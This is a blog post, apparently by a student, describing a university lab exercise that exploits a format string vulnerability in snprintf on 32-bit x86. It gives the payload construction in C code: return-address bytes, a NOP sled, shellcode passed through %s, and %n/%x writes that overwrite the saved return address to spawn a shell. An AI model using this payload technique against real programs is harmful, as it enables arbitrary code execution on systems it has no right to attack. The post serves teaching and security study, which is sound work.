Exploiting format string vulnerabilities

Saturday, 5 October, 2024 // software

Most people start off learning about executing untrusted code by exploiting buffer overflows, usually by using sprintf as an attack vector. As such, the method is pretty well documented¹ across the internet and you’d find tons of well-intentioned advice recommending developers to use snprintf instead.

We know that snprintf is safe from buffer overflow attacks because it takes a size parameter and ensures that it never writes beyond the specified buffer size:

snprintf(buffer, sizeof buffer, arg);

If that’s the case, how then can we still exploit it? The key lies in unvalidated untrusted user input. In this article, I document my learnings while attempting to exploit the snprintf method as part of an assignment in a Software Security module at NUS. I’ll only be sharing a general, high-level approach and assume you’re already familiar with using tools like GDB.

Disclaimer: The information and techniques presented in this article are intended solely for educational purposes and legitimate security research. Format string vulnerabilities and their exploitation methods should only be tested in controlled environments such as personal lab setups, authorised penetration testing scenarios, or designated practice platforms. Attempting to exploit these vulnerabilities on systems without explicit written permission is illegal and unethical. Readers are strongly encouraged to use this knowledge responsibly to improve software security, conduct authorised security assessments, and develop more secure coding practices. The author assumes no responsibility for any misuse of the information provided or any damages resulting from unauthorised testing or malicious activities.

High-level approach

Our goal is to corrupt the return address saved in the EIP register with the help of a NOP sled to redirect execution to our shellcode. The key to exploiting snprintf is in the use of every security engineer’s nightmare: undefined behaviours. In this case, it would be the %n format specifier² reading a value off the stack as an address when no arguments are provided.

We then use the %x specifier to pad the number of characters read by %n such that we can manipulate the value in the EIP register precisely. Repeat this four times and we’ll be able to overwrite the return address—one WORD (not byte!) at a time—such that it ultimately points to a location somewhere within the NOP sled, thereby executing our shellcode.

The examples from here onwards assume the vulnerable target program runs in a 32-bit x86 (little-endian) system. It contains a line of code where untrusted input into snprintf is not validated. Ironically, we’ll also be using snprintf to construct our payload. With that, let’s get started.

Payload construction

Let’s say we’ve already obtained the return address in the target program after sleuthing around in GDB, e.g. 0xffffdcec. The payload should then begin with the base address as a string literal followed by 4 bytes (WORD-sized) of junk bytes for padding. I personally like using “AAAA” as it’s easily identifiable as 0x41414141 in hexadecimal representation.

Repeat this 3 more times while incrementing the address by 1 byte each time, and we get:

char payload[400];

snprintf(payload, 400,
  "\xec\xdc\xff\xff" // base address
  "AAAA"
  "\xed\xdc\xff\xff"
  "AAAA"
  "\xee\xdc\xff\xff"
  "AAAA"
  "\xef\xdc\xff\xff"
  "AAAA"
);

Let’s walk this through a little before we continue further. The fact that they are all WORD-sized is important, because we’re anticipating how %n works when an argument is not supplied: it simply reads off the stack for the location it will write to instead. The %x specifier uses the “AAAA” value on the stack for setting its width, and then pop it off the stack so that the next %n can read the next value as an address.

NOP sled

Next, we’ll insert a 256-byte NOP sled into the payload to ease with landing the attack. This part is crucial. Recall that our goal is to overwrite the saved return address on the stack with the exact address of our shellcode.

However, because of address space layout variations, dynamic stack positions due to environment variables and just general difficulty in calculating exact offsets, there’s no way to reliably end up at the exact address of our shellcode. So instead of needing to redirect execution to a single address, a NOP sled allows us to rewrite the return address to a range of addresses. Also, the wider the NOP sled, the simpler the pointer arithmetic required.

snprintf(payload, 400,
  "\xec\xdc\xff\xff" // base address
  "AAAA"
  "\xed\xdc\xff\xff"
  "AAAA"
  "\xee\xdc\xff\xff"
  "AAAA"
  "\xef\xdc\xff\xff"
  "AAAA"
  "\x90\x90\x90..." // repeat until 256 bytes in total
);

Determining the target address

At this point, you’ll need to first figure out where your NOP sled sits in memory with some test payloads in GDB. That is why using “AAAA” as your padding value is a good idea. It’s a lot easier to spot repeating patterns that look “synthetic” in the sea of values when swimming in GDB.

Let’s assume we’ve done that, and determined that our NOP sled is between 0xffffdb74 and 0xffffdc64. Which means our target address just needs to be somewhere between them. For the sake of our example, let’s just proceed with 0xffffdc4d.

Exploit mechanism

So if we all come together, we know what to do — Toy-Box

Finally, the bee’s knees. The cat’s meow. Crème de la crème. We’ve arrived at the main exploit mechanism. The %s specifier consumes our shellcode argument and helps to align subsequent %n specifiers with the memory addresses in the earlier part of the payload.

snprintf(payload, 400,
  "\xec\xdc\xff\xff" // base address
  "AAAA"
  "\xed\xdc\xff\xff"
  "AAAA"
  "\xee\xdc\xff\xff"
  "AAAA"
  "\xef\xdc\xff\xff"
  "AAAA"
  "\x90\x90\x90..." // repeat until 256 bytes in total
  "%s"
  "%%n"
  "%%143x%%n"
  "%%35x%%n"
  "%%256x%%n",
  shellcode
);

Take note that this snprintf is not the actual vulnerable function we’re exploiting. I’m merely using snprintf to construct a payload, hence the need to escape the specifiers i.e."%%n".

Here’s where most of the magic begins to happen—the undefined behaviour I’ve been harping about. By the time the parser reaches the first %n specifier, it would have read a total of 333 characters. You can calculate it yourself this way:

(4-byte address + 4-byte 'AAAA' padding) * 4 
+ 
256-byte NOP sled 
+ 
45-byte shellcode processed by %s specifier
=
333 chars

This causes the value of 0x0000014d (hexadecimal representation of 333) to be written at the location 0xffffdcec! Because we slotted in a %x specifier padded up to 143 characters, the second %n will read and write 333 + 143 to the next address.

If we visualise the saved return address in the EIP register for the whole operation:

# Our desired address (little-endian)
0xffffdcec: [  0x4d  ][  0xdc  ][  0xff  ][  0xff  ]

# First %n writes 333 or 0x0000014d at 0xffffdcec
0xffffdcec: [  0x4d  ][  0x01  ][  0x00  ][  0x00  ]
Result at return address: 0x0000014d

# Second %n writes (333 + 143) or 0x000001dc at 0xffffdced
0xffffdcec: [  0x4d  ][  0xdc  ][  0x01  ][  0x00  ]
Result at return address: 0x0001dc4d

# Third %n writes (333 + 143 + 35) 0x000001ff at 0xffffdcee
0xffffdcec: [  0x4d  ][  0xdc  ][  0xff  ][  0x01  ]
Result at return address: 0x01ffdc4d

# Final %n writes (333 + 143 + 35 + 256) or 0x000002ff at 0xffffdcef
0xffffdcec: [  0x4d  ][  0xdc  ][  0xff  ][  0xff  ]
Result at return address: 0xffffdc4d

This approach utilises an overlapping write pattern because %n writes a 4-byte integer value padded with leading zeroes. That is why if you debug this method in GDB, you’ll see a leading ‘1’ each time the write happens.

Game over

Once the return address is overwritten, we’ve accomplished our mission. The 45-byte shellcode I used is a reference to Linux/x86 exec(’/bin/dash’) on exploit-db, which does not contain any null bytes and gives you an interactive shell. Take note that there are no null bytes if you’re using a different shellcode and choose to use %s!

This exercise was probably one of my favourite assignments, coming right after the problems in Data Structures & Algorithms. It tested my understanding of buffer overflows, pointer arithmetic skills, memory layouts and how the stack works. I had a ton of fun solving it, so much so I decided to write it down to enshrine what I learned. Hope this helps you as well.